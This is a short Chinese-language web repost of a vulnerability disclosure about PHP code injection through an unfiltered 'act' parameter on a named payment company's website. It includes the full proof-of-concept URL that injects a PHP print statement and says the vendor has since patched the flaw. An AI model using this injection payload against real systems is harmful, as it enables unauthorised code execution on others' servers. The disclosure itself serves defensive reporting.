好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

盒子支付PHP Code Injection及修复方案 - 网站安全

act参数没做过滤,可执行php命令。 http://www.iboxpay.com/gc/index.php/index/searchconsignment/act/$%7B@print(md5(admin))%7D 漏洞 证明:   http://www.iboxpay.com/gc/index.php/index/searchconsignment/act/$%7B@print(md5(admin))%7D   修复方案:   官方已经升级补丁 作者 赵小布

查看更多关于盒子支付PHP Code Injection及修复方案 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12161
  阅读:41次

上一篇: DeDeCMS v5.7最新漏洞分析 - 网站安全 - 自学php

下一篇:21cn邮箱存储型跨站漏洞或致获得cookie或钓鱼 - 网

相关资讯